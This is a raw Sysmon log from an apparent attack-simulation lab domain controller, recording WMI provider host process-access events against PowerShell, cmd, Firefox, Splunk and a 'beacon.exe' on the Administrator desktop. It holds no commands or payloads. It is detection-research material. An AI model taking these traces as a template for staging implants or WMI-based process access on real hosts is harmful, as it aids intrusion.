16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002239385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:45.138{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212\PSHost.132591776249864701.6212.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7